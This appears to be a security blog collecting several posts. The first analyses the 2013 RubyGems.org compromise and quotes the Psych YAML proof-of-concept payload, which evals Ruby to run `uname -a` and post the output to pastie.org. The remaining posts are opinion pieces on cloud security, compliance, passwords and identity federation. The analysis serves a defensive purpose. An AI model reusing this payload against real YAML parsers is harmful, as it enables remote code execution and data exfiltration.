RubyGems compromise analysis

Here is a quick analysis of the issue, and some thoughts as it pertains to RightScale users. Thanks to Tony Spataro (@xegar, and RightScale security architect) for the lions share of the analysis.

The Problem

A Proof-f-Concept was released that exploited the recent vulnerability in the Psyche YAML parser. The PoC code was uploaded to Rubygems.org, and apparently when parsing the uploaded gem, the site triggered the exploit code, and sent some information to pastie.org (hence the compromise).

When looking at the exploit code you see:

!ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection

? ! “foo\n(require ‘net/http’\n\nNet::HTTP.post_form(URI(‘http://pastie.org/pastes’),   {\n  ‘paste[authorization]’ => ‘burger’,\n  ‘paste[access_key]’    => ”,\n  ‘paste[parse_id]’\     => ‘6’,\n  ‘paste[body]’          => `uname -a`,\n  ‘paste[restricted]’    =>  ‘0’,\n  ‘commit’               => ‘Create Paste’\n}); @executed = true) unless @executed\n__END__\n”

And from a comment in the PoC:

… a gem that exploits a vulnerability in the Psych YAML parser, which allows the #[]= method to be called on arbitrary Objects. If the #[]= method later calls eval() with the given arguments, this allows for arbitrary execution of code.

You can specify arbitrary classes in Psych with !ruby/string and !ruby/hash declarations. When Psych parses !ruby/hash:Class, it will actually call #initialize and then call #[]= to populate the objects fields. If you then run an eval(), the exploit runs.

The Assessment

YAML can contain arbitrary Ruby objects which is why it’s typically a bad idea to trust it blindly. While YAML parsers try to constrain the way they cause code to be called. Namely, they try to stick to calling attribute getters and setters and object initializers and nothing else. Under normal circumstances this is a reasonable way to ensure that YAML can’t run arbitrary code — just manipulate objects’ instance data. However, let’s say a piece of code has an attribute setter, and I call the setter and pass it a chunk of string, and that string is later evaluated as code (note: eval is a bad idea), the problem arises. In that case my YAML contained an object that has an attribute value that gets treated as code, and bam, YAML now has arbitrary code execution.

This is what we suspect, but have not confirmed, happened in the RubyGems case: the YAML code as part of the PoC gem was exercised when the gem was parsed as part of the upload. Which then exercised the Psych vulnerability.

It appears that the other gems in the Rubugems.org world (i.e., their S3 bucket) are not affected. While the RubyGems maintainers are doing a review of the S3 bucket logs, this will take a bit, but per their response:

From what we know right now, no other changes on our S3 bucket have taken place, and we’re going to check the logs to make sure. Once we get a real fix for this issue out, pushing gems will be enabled again.

So, if none of your apps or libraries install a gem called “exploit”, you should be fine.

Recommendations

Here is a brief list of things I recommend you do:

  1. Install the updates as referenced in CVE-2013-0156 and CVE-2013-0155
  2. Do not load YAML code you don’t trust, and if you have to make sure you do so with extreme care
  3. Do not use any of the “exploit” PoC gems, you will be hacking yourself 😉

As a side note, if it had turned out that the S3 gems were compromised, those RightScale users leveraging our frozen repository feature would not have been exposed. Just another way RightScale is looking out for our users.

 

Cloud Security: The Secret Sauce

You’ve been hearing it for years, “The Cloud is insecure”, we’ll I am here to tell you the secret to Cloud security. Companies have paid hundreds , even millions, of dollars to try to ascertain the information in this blog, and I am offering it to you for free. You will be surprised at how secure you can make the Cloud, using the secrets and tips I will share with you. Many other security folks will tell you that it is not possible, I am here to tell you it is! Using my award-winning and tried and tested formula for success, you can have a secure cloud as well. If you enjoy this, let me know and you’ll receive immediate access to my “Secure you enterprise in 10 easy steps”, for the low price of $11.93.

With that ground work laid, I now present to you “Phil’s 10 secrets to guaranteed Cloud Security”. Please do not share this proprietary information with others, it has taken me years of research to identify these “secrets” and only want my friends to benefit from my research.

Secret #1: Random selection via dart throwing doesn’t work

My research has shown that inorder for you top be successful, you actually have to plan something, and monitor to see if it worked. Yes, believe it or not, pure random security solution dart throwing does not produce success. I know this will be a shock to many, but taking the time to identify security controls and metrics that matter to the company is key to achieving actual security.

Secret #2: Self-healing is a myth

The second item that I have uncovered is that systems will become vulnerable over time, thus patching is important. I know many of you have been under the guise that systems are self-healing, and that patching is something that is left to the neophytes, but I am here to tell you that patching is important. Those self-healing tapes you have your systems listening too are not helping. Further digging into this phenomenon, I identified that you must patch both systems and applications Imagine my surprise when I found out that applications have vulnerabilities too, and that patching them was as important as patching the systems.

Secret #3: Developers are human

Third in my “secrets to Cloud security success” lies in the often hidden fact that your developers are not perfect, and will write vulnerable code. Much to my amazement, I was shocked to find out that developers make mistakes, and in some rare cases actually have no idea about the security requirements of the applications they are writing. To thwart this nefarious exposure, testing of application code for vulnerabilities is a must, and one of the closest held secrets in the “Cloud security” community. Those of us in that community do not like to let that little secret out much. You have just been granted access to the inner-circle with that tidbit.

Secret #4: Attackers have dictionaries

Those darn hackers have dictionaries too. We should not have to use things that are complicated, but that is part of the “secret sauce”, strong authentication. While I know that using your cat’s name or street name makes things much easier, it does so for the attackers as well. My #4 secret is to use some type of strong authentication or complex (in terms of length) password. It is good if you have a lockout policy as well.

Secret #5: People can see your traffic

During my early years in InfoSec, I was part of a team that would get alerts from major backbone providers if there were certain “traffic” that matched a communication pattern. This was visible, because anything that passes over the Internet is potentially subject to “sniffing” by any device on the path the packet traverses, we need to encrypt what we put on the wire (or air for that matter). If you want something to be secret, you need to make sure it is not exposed. For our purposes, the “secret” here is to encrypt the transport on things you want to keep private.

Secret #6: Your data needs protection too

Attackers will try many vectors to get at their target, and if you forget to patch a system or application and data get’s compromised, having data encrypted at rest may buy you some time. There have been multiple occasions where a system is compromised and used to gain access to a database. If the data had been encrypted at the application layer before placing into the database, the exposure would have been significantly reduced. Further, anytime you move the data off-line, if it is encrypted, you reduce your exposure. Secret #6 says encrypt your data at rest and manage keys properly.

Secret #7: Things you don’t plan for happen

I have seen many occasions where supposed “disabled” accounts were used to gain access to systems and data that they should no longer have access to. Further, there have been times where users with excessive access have fallen into the “curiosity kills the cat” metaphor, and ventured into things they should have not. Performing reviews of who has access to what, and what access they have is another “secret to success” in the Cloud security world.

Secret #8: Logs don’t review themselves

One of the most often overlooked “secret” is watching for things that you don’t expect. You will need to implement a mechanism to actually review logs and security related events. It doesn’t need to be sexy or expensive, but it does need to meet your specific circumstance. The one thing about attackers that they will get sloppy, and you can identify them, but if you never look, you won’t (kind of like a Yogi Berra statement).

Secret #9: What you don’t know can hurt you

Back to the things people don’t think much about, knowing the ins and outs of the development framework you choose for your application is important. Leveraging the security features can be a big win, and the opposite of trying to do something the framework is not designed to do has the opposite result. So “secret” #9 is Train your developers in the security features of the development frameworks you use.

Secret #10: The dark side is not always bad

The final “secret” to success is to look at your organization like an attacker would. Risk assessments are a key part, but only of done in the reality of the environment. If you are too theoretical, you will get bogged down in noise. Too optimistic, and you’ll get hacked because you left things unprotected. My final word of advice is to “Think like a bad guy when doing risk assessments”.

Summary

If you follow my tips and apply these “secrets” in your organizations use of Cloud computing, you will have a secure cloud. If you don’t, the chances of you being successful are minimal, as my system has a proven track record of success. My competitors have no such claims!

Phil “SnakeOilSecurity” Cox

Epilogue

By the way, if you have not figured out that the whole “secret sauce” and “easy steps” stuff is just a parody on the whole infomercial thing, please read again: There is no such thing as “secret sauce” and nothing is “easy”. The things I list above are just part of an overall good security program. The reality is that you need to have good security hygiene, in the Cloud or not, that is what keeps you secure (or minimizes your risk). Not tools or promises from others.

Phil “Just another security guy trying to do his best” Cox

Get rid of your private cloud, you don’t need it!

Well maybe that is a bit harsh, but as I stated in my last post, I am convinced that in the future, everyone will be using public cloud for the most part anyway.

I just got the latest Cloud Report and much to my pleasure, the top story was about the NASDAQ planning on using Amazon Web Services for storage of critical data. The article states (emphasis added):

Nasdaq said it’s launching a cloud-based system hosted by Amazon Web Services aimed at letting broker-dealers store critical records in order to meet compliance requirements

This step by NASDAQ is inline with what I see as the true state of cloud security: Done right, it is just as good or better than your current datacenter.  I applaud the NASDAQ efforts and am in hopes that more follow suit. It is when folks break ground and make a path for others to follow, that the adoption rates will increase. I have attempted that with PCI in public cloud, and NASDAQ is forging with truly critical financial data.

Here is to you NASDAQ!!!!!!

Why your data will end up in a public IaaS cloud

While listening to a DevOps podcast with Simon Wardley, his description of the path from evolution to dispersion. Then thinking about the current biggest name in an enterprise “Microsoft”, and how they are devoting a significant amount of focus to the public model (Azure, Office 365, etc.). It dawned on me that from a backend/server standpoint, private ownership as we know it will be a thing of the past. I am not sure when, but the time is coming, when most of the servers and services that run will be in what we now consider the “public” realm.

To explain a bit, I have been a private cloud fan and see value in on premise solutions. My perspective has been from a rear view look, as it is the way I am comfortable with and know. It is NOT from peering into the future. The future for computing services, as I see it, is similar to electricity (I know this analogy has been used by many before me). Similar in that none of us have our own electricity generating facilities, we use public power. We may have generators or other backup sources of power, but everyone effectively consumes power generated by what are known as public utilities. I believe this will be the same for service systems.

Following what I took from Simon Wardley’s discussion on the DevOps podcast, I see that much will need to change to move to this commodity service standard. Policies, deployment, application design, how we view security and how we implement it, etc.. Effectively the way we do and view things must change. I am convinced it will happen.

My paraphrase of Simon’s dispersion state is that once something gets there folks neither care nor want to know what is happening under the hood.  They just want what the service provides. We are starting to see this in IT. Think about it. EVERYTHING, and I mean EVERYTHING that is innovative and has people falling all over themselves to get at is based on ubiquitous access and effectively “public” facing services. They are not behind walls, they are open to the public: All Google, Microsoft next-gen, etc.

Ultimately, a Public cloud is hosted on “public” systems, thus the title of the blog. Your data will be there. So while you are spending a lot of time building the castle, keep one eye on open space, as it is likely you will end up there at some point. Better to start thinking about it now, and how you will embrace the change. Rather than get caught up by the rush and be swept away.

I know it is short, but thought it worth a rant. Let me know what you think.

Compliance Initiatives: The Goose that laid the golden egg

Yesterday the Open Scoping Framework Group (I am a member) released the Open PCI Scoping Toolkit. The focus of the document is to help establish a consistency in the PCI scoping process, thus enabling folks to “move on” to actually getting things done. While the focus is to help there was one thread in particular that hit a hot button for me. @attrition made the following tweet which started the ball rolling 😉

attrition.org attritionorg
@Wh1t3Rabbit what a colossal waste of time and energy. no matter how you scope a PCI assessment, it is *always* smaller than attacker scope
8/31/12 3:00 PM

In a nutshell, the reaction was that spending any time on PCI compliance (inferred any compliance) is a waste of time because “compliant” does not mean “secure”. First let me state that I agree the premise that “compliant” does not equal “secure”, however at the macro level my premise is that a combination of a security program and secure systems/applications will be compliant, and that compliance initiatives may be InfoSec’s best avenue to get there.

Based on that, I believe those in InfoSec that have a visceral reaction to compliance initiatives are missing their best opprotunity to make real change. Why?

  1. It get’s budget
  2. Secure systems are the goal
  3. It makes you do things you normally would not: documentation, process, and review

Get’s Budget

We, InfoSec, are complaining on our lack of funding and always looking for more money. Heck, everyone in the company thinks they don’t have enough budget, and unless you are the government, you can’t just “make” more money. Raf Los had a recent post that stated:

“Few corporate executives will argue with the attorneys, and even fewer middle-managers are willing to defy the general counsel.”

Compliance gets the attention of upper management (i.e., the business). That attention then has weight behind it, which means additional budget that you would not get without it. This lone fact should not be overlooked nor quickly dismissed.

Secure Systems are the Goal

I know of no compliance framework whose original intent is “check a box”. They all started with the premise of protecting information. They might have grown into bureaucratic monstrosities that get nothing done, but at their core, they want true security. The sole purpose of the PCI DSS is to protect cardholder data, and thus limit the financial risk to the Card Brands. No more, no less. Others have hijacked it as a mechanism to line their pockets or further their careers, but at its origins, it is about secure systems and applications to prevent unauthorized access and use of credit cards.

Like all compliance initiatives, HIPAA, FISMA, SOX, etc. the true intent is secure systems. As InfoSec we need to keep this in focus and champion that cause. If you get weary doing that, it is not the fault of the compliance requirement.

There is nothing that prevents you from actually deploying secure systems to meet the requirement. If you do not, you need to blame something other than the compliance requirement.

Things You Should do but Don’t

One other point on this is that all compliance initiatives require some type of documentation, process, and review component. It has been my experience in the past 20+ years in InfoSec that most folks do not do these, and are mostly irritated that they are expected to. Yet, they are a CRITICAL part of a successful long-term program. The current state of “documentation, process, and review” is pathetic even with the compliance requirements for it, I’d argue that it would be almost non existent if there were no requirements.

A security program with out those three “hygiene” components is bound to fail. I am glad the compliance programs force that hand.

Not a Panacea

I get it. Compliance initiates have their problems:

  • Not all of the funds can be used to secure the systems and applications. Some will be used for auditors or other things that you may deem useless. On the other hand, having an external entity check your work is usually a good thing, so even this could be seen as a positive
  • Some folks just look for check boxes. If you’re the type of person that will just “check” a box to get it done, then you have no business in InfoSec. If the company you work for wants you to just “check” the boxes, then you need to find another company, as they are asking you to lie. The movie “Fun with Dick and Jane” always comes to mind for those type of organizations.You have to be committed to the cause and hold your ground.

So …
As you can tell, I see compliance initiatives as a net positive tool that can help me accomplish my mission of protecting the systems and applications at my company. I suggest that you use them to get traction and implement things. Nothing is perfect, but it is a start, and currently one of the few things that will get management attention in any size organization.

You have two choices: complain or use the opportunity. It is your choice. To take a biblical quote and put it into my current mindset:

“Choose you this day what you will do, either just check the boxes, or do nothing and complain, but as for me any my team, we will use compliance to help secure our systems.” (Play on Joshua 24:14)

Passwords – You are likely wrong in your recommendations

This is going to be a short and to the point, if you allows passwords less than 11 characters, they are not strong, and are subject to brute force in a relatively short period of time. Using a practical analysis of password complexities from https://www.grc.com/haystack.htm, we find that using the “massive cracking scenario” we have the following brute force times:

  • <11 char Upper+Lower+Num+Special = 1 week to crack
  • 11 char U+L+N+S = 1.83 years
  • 12 char U+L+N = 1 year
  • 13 char U+L = 6.59 years
  • 16 char single case = 14 years

This assumes that the passwords were not guessable by a well-known search algorithm (i.e., words or “common” phrases). Based on the numbers I ran at haystack, I feel that  any responsible organization should have the following minimum password standard for length and complexity:

  • A minimum password length of 13 characters
  • Must not choose passwords that consist entirely of common phrases or regularly used combination of dictionary words. The use of random word combinations is key. Avoiding passwords based on repetition, dictionary words, letter or number sequences, usernames, relative or pet names, romantic links (current or past), or biographical information (e.g., ID numbers, ancestors’ names or dates).
  • Choose passwords that contain at least two character classes (Upper alphabetic, Lower alphabetic, Numeric, Non-alphanumeric symbols)
  • Avoiding using the same password for multiple sites or purposes

Here is a walk through an example:

Go to https://www.grc.com/haystack.htm

  • Enter Z2#$gY&!stw* = 1.74 centuries
  • Then enter “energy never ate flashlight” = 2.10 trillion trillion centuries

Some may say “well if I tell you how the password is constructed it doesn’t help you to cut down the search time for the first, but significantly for the second.” To which I would answer “Disagree, second is random selection of common words, minimum length of X. The fact that #1 basically needs to be stored somewhere to be remembered is a much bigger risk.”

So, if I say, all lower case 18 char long, brute force must search the entire ascii space for that length, you don’t know length of any word, as it sis semi-random. If you use common phrases, you are in trouble, the use of random combinations is mathematically a huge haystack. I am not a mathematician, but when I see the studies on it, it makes sense. It is when folks start using the common phrases or common combinations that the entropy drops significantly

In a nutshell, I would rather have folks using the “random combo” they can remember and not write down/store, over the “seemingly complex” that they will store somewhere.

This is basically what the well-known XKCD comic (https://xkcd.com/936/) said as well, but I just don’t see folks getting it.

I hope you will.

 

Kerberos for Cloud ID Federation: Why or Why Not?

During the “When IT Fails: A Novel” reviewer party at RSA Conference, I was talking with Ben Rockwood (@benr) about Cloud Identity, and mentioned that I had just written an article for Dark Reading on Cloud IdM, the issues around them and current solutions. He asked me what they were and I told him:

  • Identities maintained at the Cloud Provider
  • Identities maintained as the organization and then “sync’d” with the Cloud Provider
  • Identity Federation
  • Identity as a Service (IDaaS)

He promptly challenged me with “What about Kerberos?” I was taken back a bit, then thought back (way back) to discussions (more me listening to them educate me) with Paul Hill, Dan Geer, and Jeff Schiller about Project Athena and the goal of the Kerberos portion: Provide authentication between different trusting entities in a hostile networking environment (my paraphrase of the discussions). So what do I want of my Cloud IdM: Authentication of users from different trust zones across a hostile network.

So, to the questions “What about Kerberos?”, I answer “NO”. I spent some time talking with my friend and Identity rockstar Paul Hill about the issue, and here are some reasons why not Kerberos:

  1. SAML has a wider privacy model. In the area of higher edu, the linkage to Library providers and Publishers and the model where they need to know that you belong to a group (e.g., the University) and not your individual identity, makes SAML a better fit. While Kerberos is working on an “anonymous” ticket, the flexibility currently exists in SAML to have varying degrees (i.e., taylored to the applicaiton) of info on the subject question.
  2. Establishing trust relationships. There is wide support for federation organizations like incommon.org (a federation of 200+ organizations supporting establishing SAML trust relationships). Whereas Kerberos has no such support organization. While it technically feasible to do this, no organization has stepped up to do it. The overhead of establishing the trust relationships is significantly higher with Kerberos that SAML.
  3. SAML has the ability to indicate the Authentication mechanism, as well as the trust level of the identity in question. While this bleeds into the access control area, SAML can aid you in access control, Kerberos can not.
So in a nut shell, there is really not a significant technical reason to “Why not Kerberos?”, it can do what is needed, but there are meta reasons: Current adoption (e.g., VHS vs Betamax), and Flexibility.

“Scared Straight” the only hope for “entitlement” minded users

I just got done reading an article on Yahoo Finance about how young professionals and college students will go to about any lengths to get Internet access, and more specifically Social Media access. I have no problem with mixing business and personal lives in a connected world. I do it all the time, it is the current trend and I don’t see it fading. The part of the article that bothered me was the following observation:

“The desire for on-demand access to information is so ingrained in the incoming generation of employees that many young professionals take extreme measures to access the Internet, even if it compromises their company or their own security.”

In reality, I don’t care about the “own security”. They are adults and can do what they want. They can also suffer the consequences of Identity Theft or other issues. Where I have the problem is that these users are so “addicted” to connectivity that they would risk their company, and thus the livelihood of others that work for the company is unacceptable. To me, it shows the “entitlement mentality” and short-sighted approach to life many are developing. The simple fact that someone does not care if his actions could cause significant impact on they company he works for is telling, and the tale it tells is sad.

However, being a “fixer”, I thought “What would it take to change that behavior?”. I was brought back to a TV show I saw in my youth; Scared Straight. The show brought troubled youth face to face with hardened criminals and attempted to give them a “real” glimpse into what their future was going to be. I see the only way to reset this entitlement mentality is with a “technical scared straight”. It is important for me, as the driver of security in my company, to provide opportunities to engage those that might succumb to this “get it an any cost” mentality and show them that their actions can have real impact.

What does this mean exactly?
How does it look?

It is showing live hacks on the actions they perform. It is:

  • having a demo on hijacking a jailbroke phone and getting access to data
  • booting a laptop from USB and pulling data off an unencrypted drive
  • performing a phishing attack on their social media connection
  • etc.

You have to be imaginative and figure out what will hit those user in the proverbial nose. I want to get their attention, then finish with pointing out obvious, but maybe not so front of the brain facts such as:

  • if the company they work for fails, then they lose their jobs
  • if they contribute to that failure, then they have contributed to the loss of jobs for all their co-workers
  • if they contribute to that failure, then they have contributed to the loss of services to their customers

Basically bring it home. I have found that it is usually NOT lack of caring, but lack of understanding that is the reason for most of the apparent disregard for rules. For those that don’t care, even after meaningful dialogue, then I say “There is the door, have fun at your new job….”

Thoughts on CloudExpo

This was my first CloudExpo and I had very high hopes of technical sessions and opportunities to have meaningful conversations about Cloud and Security. Those hopes were quickly dashed as I sat through session after session that started with a good premise and quickly rolled into a sales pitch for the company presenting. I am not opposed to speakers promoting their product, they are taking the time to present and made the commitment, I am OK with that. What did bother me was the implications that “their product was the only way to solve this problem”. Not all were like this, but most that I attended were. When I hear statements like:

  • “there is no such thing as Private Cloud” from a purely public cloud company
  • “those guys did crypto wrong, so we had to do it right” yet those other guys are saying the same thing about them
  • It goes on

My best experiences at the conference were my 1-1 discussions during breaks or at lunch. In particular talking to Dave Asprey of Trend Micro about their Deep Security product, as well as Bio-Hacking (stuff for another blog). Or the lunch chat with the folks from PerspecSys. We started talking about how you protect sensitive data, which covers the typical at rest and in transit discussions, but then when asked about”in process/memory” they are the ONLY ones I have ever run into that had the right answer “you can’t” so “we do it on-premise”. They have an interesting solutions, and worth a look if you have that stringent of a security requirement. Or my breakfast with Sanket from Coupa Software discussing security programs for SaaS based companies and how we really get it done.

All in all, I am glad I went, because it gave me chance to have those conversations. I am in hopes that next time I go to a CloudExpo, or if I ever speak at one, the sessions will be more about the needs of the audience, and less about the presenters company.

As a side note, while I don’t drink, the RightScale Cocktail party and “after” parties seemed to be a great hit, and meeting people at them was a blast as well (not from a technical standpoint, but meeting interesting folks with varied backgrounds).

 

Till next time.

Why “Just Good Enough” should be the goal

I spend a lot of time thinking about security in many different contexts. I am not sure why my mind immediately goes to “how can I break that” when I see just about anything, which leads me to see security as something people should inherently think about (and value). The reality is that I am an oddity. Most people don’t think they way I do, and more importantly they do not see the same amount of value (i.e., they will not spend money) on the things that I would. This frustrating point got me to thinking “Why?”. Why don’t people see the value and the urgency that I do in many things? Well the simple fact is that, they DO care about security,they just do not care about security itself. To me security is a hobby, something with intrinsical value for my curious mind. For most others, security is an attribute they want, but don’t care specifically about how. They want a level of security that is “just good enough”, and they are willing to pay for that. Be it in a personal or professional setting.

So then I sent to if all they want is “Just Good Enough” security, what does that really mean? I went immediately to Humpty Dumpty:

“When I use a word, it means just what I choose it to mean, neither more nor less”

That is what “Just Good Enough” is, whatever you decide it to be, and I agree completely that this is the level of security you should strive for in your personal and professional life. Most will think that I am advocating “what can I get away with” security, and I am not. I am advocating that in a personal or professional setting, you should not spend a single penny more, or expend one additional minute, for security than you have to. Your goal should be security that is “Just Good Enough”. Now the kicker, how do you know what is “Just Good Enough”? Simple “Just Good Enough” is that same as “Acceptable Risk” you know you have hit that line when you know the true risk to whatever it is you are trying to protect, and at the point you can say “I am comfortable with the chance of the bad thing happening and not being able to prevent it”.

Let’s take a quick example. If you were going to walk down the ritzy part of Rush street in Chicago during the Christmas time, your “Just Good Enough” security for your personal safety is likely nothing more than your ability to yell for help should you need it. However, if you are walking down the main drag in Kabul, that level of “Just Good Enough” is going to be significantly different, and I might say, it will be slightly different for every individual, as each of their “acceptable risk” levels will be different.

So where am I going with this? If we go to the professional context, if you want to be successful and truly help your company, then you should understand your environment and have a goal of implementing a security level that is “Just Good Enough”. Best practices are a red-herring, there is no such thing. On a tweet the other day, @e_cowperthwaite said we should use the term “standard practice” instead, and I agree. But “standard” is not always “best”. Your “best practice” will be specific to you and your environment and not an industry.

So my point: Don’t spend a cent more on security than you must. It is not about “what can I get away with” but “what is the minimum I must do”. The latter must be an educated decision, and backed by those who have the skin in the game.